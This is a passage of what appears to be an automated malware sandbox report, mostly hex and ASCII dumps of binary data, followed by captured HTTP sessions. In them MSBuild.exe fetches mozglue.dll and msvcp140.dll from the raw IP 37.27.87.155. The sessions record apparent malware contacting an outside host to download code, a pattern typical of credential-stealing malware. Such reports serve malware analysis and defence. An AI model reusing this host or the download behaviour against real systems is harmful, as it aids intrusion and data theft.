                                                                                                                                                                                                                                                                          2024-04-20 12:28:22 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                                                          Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                                                          Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                                                          Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                                                          Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                                                          Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                                                          Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                                                          Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                                                          Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                                                          Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          12192.168.2.44974937.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:24 UTC156OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:24 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 608080
                                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                                                          Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                                                          Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                                                          Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                                                          Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                                                          Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                                                          Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                                                          Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                                                          2024-04-20 12:28:25 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                                                          Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          13192.168.2.44975037.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:26 UTC157OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:27 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:26 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 450024
                                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
